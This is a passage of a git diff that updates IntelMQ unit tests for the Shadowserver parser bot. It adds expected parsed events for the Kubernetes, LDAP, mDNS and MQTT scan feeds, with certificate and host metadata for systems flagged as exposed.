+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_kubernetes-test.csv",
+                  }
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'open-kubernetes',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.browser_error' : 'x509: failed to load system roots and no roots provided',
+   'extra.browser_trusted' : 'N',
+   'extra.build_date' : '2021-11-17T13:00:29Z',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.compiler' : 'gc',
+   'extra.content_type' : 'application/json',
+   'extra.date' : 'Tue, 10 May 2022 14:24:13 GMT',
+   'extra.git_commit' : '2444b3347a2c45eb965b182fb836e1f51dc61b70',
+   'extra.git_tree_state' : 'clean',
+   'extra.git_version' : 'v1.20.13',
+   'extra.go_version' : 'go1.15.15',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.http' : 'HTTP/1.1',
+   'extra.http_code' : 200,
+   'extra.http_reason' : 'OK',
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.major' : '1',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.minor' : '20',
+   'extra.platform' : 'linux/amd64',
+   'extra.self_signed' : False,
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.tag' : 'kubernetes',
+   'feed.name' : 'Accessible Kubernetes API Server',
+   'protocol.application' : 'kubernetes',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 6443,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-kubernetes',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.browser_error' : 'x509: failed to load system roots and no roots provided',
+   'extra.browser_trusted' : 'N',
+   'extra.build_date' : '2022-02-25T06:26:46Z',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.compiler' : 'gc',
+   'extra.content_type' : 'application/json',
+   'extra.date' : 'Tue, 10 May 2022 14:24:12 GMT',
+   'extra.git_commit' : '6f5a5295923a614a4202a7ad274b38b69f9ca8c0',
+   'extra.git_tree_state' : 'clean',
+   'extra.git_version' : 'v1.23.3+e419edf',
+   'extra.go_version' : 'go1.17.5',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.http' : 'HTTP/1.1',
+   'extra.http_code' : 200,
+   'extra.http_reason' : 'OK',
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.major' : '1',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.minor' : '23',
+   'extra.platform' : 'linux/amd64',
+   'extra.self_signed' : False,
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.sector' : 'Retail Trade',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.tag' : 'kubernetes',
+   'feed.name' : 'Accessible Kubernetes API Server',
+   'protocol.application' : 'kubernetes',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 6443,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-kubernetes',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.browser_error' : 'x509: failed to load system roots and no roots provided',
+   'extra.browser_trusted' : 'N',
+   'extra.build_date' : '2020-05-08T07:29:59Z',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.compiler' : 'gc',
+   'extra.content_type' : 'application/json',
+   'extra.date' : 'Tue, 10 May 2022 14:24:12 GMT',
+   'extra.git_commit' : '4f7ea78',
+   'extra.git_version' : 'v1.16.9-aliyun.1',
+   'extra.go_version' : 'go1.13.9',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.http' : 'HTTP/1.1',
+   'extra.http_code' : 200,
+   'extra.http_reason' : 'OK',
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.major' : '1',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.minor' : '16+',
+   'extra.platform' : 'linux/amd64',
+   'extra.self_signed' : False,
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.tag' : 'kubernetes',
+   'feed.name' : 'Accessible Kubernetes API Server',
+   'protocol.application' : 'kubernetes',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 6443,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ldap.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ldap_udp.py
similarity index 97%
rename from intelmq/tests/bots/parsers/shadowserver/test_scan_ldap.py
rename to intelmq/tests/bots/parsers/shadowserver/test_scan_ldap_udp.py
index 5d1d8563d..555b9b8dc 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ldap.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ldap_udp.py
@@ -11,7 +11,7 @@
 import intelmq.lib.utils as utils
 from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
 
-with open(os.path.join(os.path.dirname(__file__), 'testdata/scan_ldap.csv')) as handle:
+with open(os.path.join(os.path.dirname(__file__), 'testdata/scan_ldap_udp.csv')) as handle:
     EXAMPLE_FILE = handle.read()
 EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
 
@@ -19,7 +19,7 @@
                   "raw": utils.base64_encode(EXAMPLE_FILE),
                   "__type": "Report",
                   "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-scan_ldap-test-geo.csv",
+                  "extra.file_name": "2019-01-01-scan_ldap_udp-test-geo.csv",
                   }
 EVENTS = [{'__type': 'Event',
            'feed.name': 'Open LDAP',
@@ -37,7 +37,7 @@
            "extra.is_global_catalog_ready": True,
            "extra.is_synchronized": True,
            "extra.ldap_service_name": "rodwil.com:servidor$@RODWIL.COM",
-           "extra.naics": 517311,
+           "extra.source.naics": 517311,
            "extra.naming_contexts": "DC=rodwil,DC=com|CN=Configuration,DC=rodwil,DC=com|CN=Schema,CN=Configuration,DC=rodwil,DC=com|DC=DomainDnsZones,DC=rodwil,DC=com|DC=ForestDnsZones,DC=rodwil,DC=com",
            "extra.root_domain_naming_context": "DC=rodwil,DC=com",
            "extra.schema_naming_context": "CN=Schema,CN=Configuration,DC=rodwil,DC=com",
@@ -80,7 +80,7 @@
            "extra.is_global_catalog_ready": True,
            "extra.is_synchronized": True,
            "extra.ldap_service_name": "TAC02:win-a8wca1isieb$@TAC02",
-           "extra.naics": 517311,
+           "extra.source.naics": 517311,
            "extra.naming_contexts": "DC=TAC02|CN=Configuration,DC=TAC02|CN=Schema,CN=Configuration,DC=TAC02|DC=ForestDnsZones,DC=TAC02|DC=DomainDnsZones,DC=TAC02",
            "extra.root_domain_naming_context": "DC=TAC02",
            "extra.schema_naming_context": "CN=Schema,CN=Configuration,DC=TAC02",
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_mdns.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_mdns.py
index 5cf4fdd8b..9207aaf36 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_mdns.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_mdns.py
@@ -21,55 +21,89 @@
                   "time.observation": "2015-01-01T00:00:00+00:00",
                   "extra.file_name": "2019-01-01-scan_mdns-test-geo.csv",
                   }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Open mDNS',
-           "classification.identifier": "open-mdns",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.services": "_workstation.examplehostname.local.;",
-           "extra.tag": "mdns",
-           "extra.workstation_info": "[00:00:00:00:00:00]",
-           "extra.workstation_ipv4": "198.51.100.176 198.51.100.176 198.51.100.176",
-           "extra.workstation_name": "examplehostname.local.",
-           "protocol.application": "mdns",
-           "protocol.transport": "udp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           "source.asn": 24940,
-           "source.geolocation.cc": "DE",
-           "source.geolocation.city": "GUNZENHAUSEN",
-           "source.geolocation.region": "BAYERN",
-           "source.ip": "198.51.100.4",
-           "source.port": 5353,
-           "source.reverse_dns": "198-51-100-182.example.net",
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2016-07-24T07:38:35+00:00"
-           },
-           {'__type': 'Event',
-           'feed.name': 'Open mDNS',
-           "classification.identifier": "open-mdns",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.services": "_workstation.examplehostname.local.;",
-           "extra.tag": "mdns",
-           "extra.workstation_info": "[00:00:00:00:00:00]",
-           "extra.workstation_ipv4": "198.51.100.176 198.51.100.176 198.51.100.176 198.51.100.176 198.51.100.176",
-           "extra.workstation_ipv6": "2001:0db8:abcd:0012:0000:0000:0000:0000",
-           "extra.workstation_name": "examplehostname.local.",
-           "protocol.application": "mdns",
-           "protocol.transport": "udp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           "source.asn": 24940,
-           "source.geolocation.cc": "DE",
-           "source.geolocation.city": "GUNZENHAUSEN",
-           "source.geolocation.region": "BAYERN",
-           "source.ip": "198.51.100.221",
-           "source.port": 5353,
-           "source.reverse_dns": "198-51-100-221.example.net",
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2016-07-24T07:38:36+00:00"
-           },
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mdns',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.http_ipv4' : '192.168.0.1',
+   'extra.http_ipv6' : 'fd09:4ab5:dae9:b078::1',
+   'extra.services' : '_smb._tcp.local.; _device-info._tcp.local.; _http._tcp.local.; _dacp._tcp.local.;',
+   'extra.tag' : 'mdns',
+   'extra.workstation_ipv4' : '192.168.0.1',
+   'extra.workstation_ipv6' : 'fd09:4ab5:dae9:b078::1',
+   'feed.name' : 'Open mDNS',
+   'protocol.application' : 'mdns',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 5353,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mdns',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.http_ipv4' : '192.168.0.2',
+   'extra.http_ipv6' : 'fd09:4ab5:dae9:b078::2',
+   'extra.services' : '_home-assistant._tcp.local.;',
+   'extra.tag' : 'mdns',
+   'extra.workstation_ipv4' : '192.168.0.2',
+   'extra.workstation_ipv6' : 'fd09:4ab5:dae9:b078::2',
+   'feed.name' : 'Open mDNS',
+   'protocol.application' : 'mdns',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 5353,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mdns',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.http_info' : '\\\\\"vendor=Synology\\\"\\\" \\\"\\\"model=DS218+\\\"\\\" \\\"\\\"serial=17A0PCN482002\\\"\\\" \\\"\\\"version_major=6\\\"\\\" \\\"\\\"version_minor=2\\\"\\\" \\\"\\\"version_build=25556\\\"\\\" \\\"\\\"admin_port=5000\\\"\\\" \\\"\\\"secure_admin_port=5001\\\"\\\" \\\"\\\"mac_address=00:11:32:80:fd:b5\\\"\\\"\"',
+   'extra.http_ipv4' : '192.168.0.3',
+   'extra.http_ipv6' : 'fd09:4ab5:dae9:b078::3',
+   'extra.http_name' : 'snmeijer.local.',
+   'extra.http_port' : 5000,
+   'extra.http_ptr' : 'snmeijer._http._tcp.local.',
+   'extra.http_target' : 'snmeijer.local.',
+   'extra.services' : '_webdav._tcp.local.; _adisk._tcp.local.; _smb._tcp.local.; _http._tcp.local.; _dacp._tcp.local.; _afpovertcp._tcp.local.; _device-info._tcp.local.;',
+   'extra.tag' : 'mdns,iot',
+   'extra.workstation_ipv4' : '192.168.0.3',
+   'extra.workstation_ipv6' : 'fd09:4ab5:dae9:b078::3',
+   'feed.name' : 'Open mDNS',
+   'protocol.application' : 'mdns',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 5353,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
           ]
 
 class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt.py
index 8e8e0499d..45d19f9ee 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt.py
@@ -21,56 +21,51 @@
                   "time.observation": "2020-03-15T00:00:00+00:00",
                   "extra.file_name": "2020-03-14-scan_mqtt-test-geo.csv",
                   }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Open-MQTT',
-           "classification.identifier": "open-mqtt",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.anonymous_access": True,
-           "extra.code": "Connection Accepted",
-           "extra.hex_code": "00",
-           "extra.naics": 518210,
-           "extra.raw_response": "20020000",
-           "extra.tag": "mqtt",
-           "protocol.application": "mqtt",
-           "protocol.transport": "tcp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           "source.asn": 12345,
-           "source.geolocation.cc": "AA",
-           "source.geolocation.city": "CITY",
-           "source.geolocation.region": "REGION",
-           "source.ip": "123.45.67.89",
-           "source.port": 1883,
-           'source.reverse_dns': 'some.host.com',
-           "time.observation": "2020-03-15T00:00:00+00:00",
-           "time.source": "2020-03-14T05:45:48+00:00"
-           },
-{'__type': 'Event',
-           'feed.name': 'Open-MQTT',
-           "classification.identifier": "open-mqtt",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.anonymous_access": False,
-           "extra.code": "Connection Refused, Server unavailable",
-           "extra.hex_code": "03",
-           "extra.naics": 454110,
-           "extra.raw_response": "20020003",
-           "extra.tag": "mqtt",
-           "protocol.application": "mqtt",
-           "protocol.transport": "tcp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           "source.asn": 12345,
-           "source.geolocation.cc": "AA",
-           "source.geolocation.city": "CITY",
-           "source.geolocation.region": "REGION",
-           "source.ip": "123.45.67.90",
-           "source.port": 1883,
-           'source.reverse_dns': 'another.host.com',
-           "time.observation": "2020-03-15T00:00:00+00:00",
-           "time.source": "2020-03-14T05:45:51+00:00"
-           },
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mqtt',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.anonymous_access' : False,
+   'extra.cert_expiration_date' : '2022-11-14 00:00:00',
+   'extra.cert_issue_date' : '2020-08-12 00:00:00',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : '085699743A23114C9B6B8DC975A8AF42',
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256',
+   'extra.code' : 'Connection Refused, not authorized',
+   'extra.hex_code' : '05',
+   'extra.issuer_common_name' : 'Sectigo RSA Domain Validation Secure Server CA',
+   'extra.issuer_country' : 'GB',
+   'extra.issuer_locality_name' : 'Salford',
+   'extra.issuer_organization_name' : 'Sectigo Limited',
+   'extra.issuer_state_or_province_name' : 'Greater Manchester',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'DE:2C:98:30:27:2E:7D:C9:ED:A3:9D:AF:9E:CE:14:CC',
+   'extra.raw_response' : '20020005',
+   'extra.sha1_fingerprint' : '70:84:F1:6D:28:DA:B6:E6:27:60:13:8B:2C:93:52:B6:7B:4B:13:7B',
+   'extra.sha256_fingerprint' : 'D2:D7:54:52:EB:86:4E:2D:34:4D:FC:CE:CD:CF:39:41:E1:06:5C:8B:B8:54:E6:0C:DF:FD:6E:E3:F1:B5:41:00',
+   'extra.sha512_fingerprint' : '17:57:FB:88:9D:BE:A7:F0:29:A5:31:FC:79:DF:F7:8A:1C:D6:4A:DF:1B:4A:DC:BF:05:E7:E8:2F:79:9A:FA:FE:F7:E8:66:22:CB:B9:4C:72:F7:FB:6C:1D:59:8C:54:63:70:05:DE:7F:3C:2F:BA:B8:37:18:CE:29:6F:11:E8:AB',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.naics' : 454110,
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : '*.tracesafe.io',
+   'extra.tag' : 'mqtt',
+   'feed.name' : 'Open-MQTT',
+   'protocol.application' : 'mqtt',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 12345,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'COLUMBUS',
+   'source.geolocation.region' : 'OHIO',
+   'source.ip' : '18.220.0.0',
+   'source.port' : 8883,
+   'source.reverse_dns' : '18-220-0-0.example.com',
+   'time.observation' : '2020-03-15T00:00:00+00:00',
+   'time.source' : '2022-02-07T12:56:53+00:00'
+}
           ]
 
 class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt_anon.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt_anon.py
new file mode 100644
index 000000000..461895724
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_mqtt_anon.py
@@ -0,0 +1,173 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_mqtt_anon.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Open Anonymous MQTT',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_mqtt_anon-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mqtt-anon',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.cert_expiration_date' : '2030-05-06 08:07:05',
+   'extra.cert_issue_date' : '2020-05-08 08:07:05',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : '02',
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256',
+   'extra.code' : 'Connection Accepted',
+   'extra.hex_code' : '00',
+   'extra.issuer_common_name' : 'RootCA',
+   'extra.issuer_country' : 'CN',
+   'extra.issuer_organization_name' : 'EMQ',
+   'extra.issuer_state_or_province_name' : 'hangzhou',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'AB:A8:E0:2C:EF:AE:BF:9D:DD:FA:70:BA:2F:F2:CA:5C',
+   'extra.raw_response' : '20020000',
+   'extra.sha1_fingerprint' : '70:1A:1E:1F:EC:5F:7E:A9:12:32:B2:C9:8A:C9:EE:91:8E:0B:82:45',
+   'extra.sha256_fingerprint' : '85:26:A2:F2:A2:50:CD:96:33:19:A6:2D:12:2E:97:6B:D3:06:3C:11:EA:01:B4:B7:25:2A:B7:4F:0A:8F:45:40',
+   'extra.sha512_fingerprint' : '72:50:07:30:9A:6F:CB:FD:E2:80:69:02:65:62:77:16:C3:B4:0C:98:44:4E:D4:2C:AC:6B:AF:F8:9E:AB:51:C2:FA:A8:72:A3:45:DF:81:09:50:08:18:EB:03:34:FC:92:33:A7:12:46:FE:90:20:91:86:C5:4D:89:48:86:4C:CD',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.naics' : 518210,
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'Server',
+   'extra.subject_country' : 'CN',
+   'extra.subject_organization_name' : 'EMQ',
+   'extra.subject_state_or_province_name' : 'hangzhou',
+   'extra.tag' : 'mqtt,mqtt-anon',
+   'feed.name' : 'Open Anonymous MQTT',
+   'protocol.application' : 'mqtt',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 37963,
+   'source.geolocation.cc' : 'CN',
+   'source.geolocation.city' : 'SHENZHEN',
+   'source.geolocation.region' : 'GUANGDONG SHENG',
+   'source.ip' : '47.106.0.0',
+   'source.port' : 8883,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:59:34+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mqtt-anon',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.cert_expiration_date' : '2022-03-06 13:48:03',
+   'extra.cert_issue_date' : '2021-12-06 13:48:04',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : '06B25BEAD1F43266ABCFCDDE408D3544D04B',
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256',
+   'extra.code' : 'Connection Accepted',
+   'extra.hex_code' : '00',
+   'extra.issuer_common_name' : 'R3',
+   'extra.issuer_country' : 'US',
+   'extra.issuer_organization_name' : 'Lets Encrypt',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : '23:99:39:C6:77:D8:9F:55:90:FC:A5:FB:BA:72:8B:42',
+   'extra.raw_response' : '20020000',
+   'extra.sha1_fingerprint' : '20:0E:AC:E7:AF:07:8D:D3:16:7C:63:D1:B9:12:AD:1D:2C:F0:46:86',
+   'extra.sha256_fingerprint' : 'DD:7A:4C:8A:1D:66:1D:7C:F5:17:04:5B:A0:B4:C4:E0:80:58:44:B4:DB:A7:5E:61:AE:43:9D:85:4C:9E:DC:83',
+   'extra.sha512_fingerprint' : '55:B6:3D:56:A4:39:6E:99:B6:AF:72:AF:4D:3C:7C:C5:A8:C5:4F:A1:79:92:D0:46:8A:A2:9B:2A:48:0D:00:68:39:F0:B8:67:B4:E0:88:51:2A:D7:55:46:83:BD:ED:1E:09:6E:DB:3D:21:E2:AA:DB:42:6A:33:45:1A:2A:DB:4C',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.naics' : 518210,
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.tag' : 'mqtt,mqtt-anon',
+   'feed.name' : 'Open Anonymous MQTT',
+   'protocol.application' : 'mqtt',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
